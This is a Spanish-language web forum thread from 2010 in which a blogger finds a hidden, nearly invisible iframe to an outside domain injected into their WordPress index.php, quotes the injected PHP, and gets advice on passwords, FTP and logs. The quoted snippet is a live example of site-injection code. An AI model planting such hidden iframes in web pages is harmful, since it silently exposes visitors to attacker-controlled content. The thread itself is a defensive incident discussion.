Se me coló un "marine" y me colgó un iframe...

rogertm · #1 (**permalink**) 16/12/2010, 15:20

Woow... mientras estaba corrigiendo algunos warnings en mi blog, me di cuenta que tenía algo mal en él, fui a ver mi código fuente, osea, el html devuelto por el navegador y me encuentro con esto:

Código HTML:

Ver original<iframe src="http://www.bestwebcam.cz.cc" scrolling="auto" width=1% height=1% frameborder="0"> </iframe>

Mir'e por mi footer.php y mi index.php en mi theme y nada, entonces decidí entrar a mi host y en el index.php de wordpress tenía esto:

Código PHP:

Ver original<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */
 
/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);
 
/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
$varri = "http://www.bestwebcam.cz.cc";
 
?>
 
<iframe src=<?php print $varri; ?> scrolling="auto" width=1% height=1% frameborder="0"> </iframe>

¿Es una bulnerabilidad de WP o tengo que llamar a mi administrador de hostin para tener una charla con él?

ArturoGallegos · #2 (**permalink**) 16/12/2010, 15:55

todos los CMS tienen vulnerabilidades aunque yo si llamaría al soporte del hosting para que te aclaren la duda de como se dio el problema, lo mas seguro es que te dirán fue un cambio vía FTP y te recomendaran cambiar la contraseña y limpiar tus archivos.... pero lo importante sera que te digan el nombre del usuario y la hora en que se efectuó la incidencia, de esa forma tu podrás determinar quien fue el culpable.

de igual forma anticipate a eso y empieza a revisar tus maquinas desde donde tienes acceso al ftp que no tengan virus ni nada, y procede a cambiar la contraseña... generalmente los usuarios usan una contraseña débil esta vez usa una fuerte.

rogertm · #3 (**permalink**) 16/12/2010, 16:10

Gracias... me dispongo a revisar los Access Logs...

AlZuwaga · #4 (**permalink**) 16/12/2010, 20:41

Perdón por el offtopic; pero... qué sería un "marine" en este contexto?
(es que intenté entrar a www.bestwebcam.XYZ.BlaBla y me dio errores de PHP... tal vez entrando me enteré lo de "marine", pero no pude)

metacortex · #5 (**permalink**) 16/12/2010, 23:43

Lee esto: http://www.forosdelweb.com/f118/come...9/#post3491617

rogertm · #6 (**permalink**) 17/12/2010, 08:06

Cita:

Iniciado por metacortex

Lee esto: http://www.forosdelweb.com/f118/come...9/#post3491617

Ya había leído ese comentario tuyo, y creo que hasta te karmé por eso, incluso recuerdo que lo pasé por twitter, ahora para no perderlo lo metí a mis marcadores en delicious.

En cuanto a plugins, el único que usa formularios es Contact Form 7, que me parece es el más usado para este fin y por ende el más seguro (debe al menos serlo), ahora te exigen que instales Really Simple CAPTCHA y me parece bien.

Esto ya me había pasado en otro sitio de los que tenemos en nuestro server, tendremos que ver cual es realmente el problema, y lo mismo me pasó ayer en mi dominio principal, aunque allí lo único que tengo es un simple codiguillo html5, y pregunto ¿debería hacer otra cosa allí?

Cita:

Iniciado por AlZuwaga

Perdón por el offtopic; pero... qué sería un "marine" en este contexto?
(es que intenté entrar a www.bestwebcam.XYZ.BlaBla y me dio errores de PHP... tal vez entrando me enteré lo de "marine", pero no pude)

Marine es mi manera de llamar a estos tipos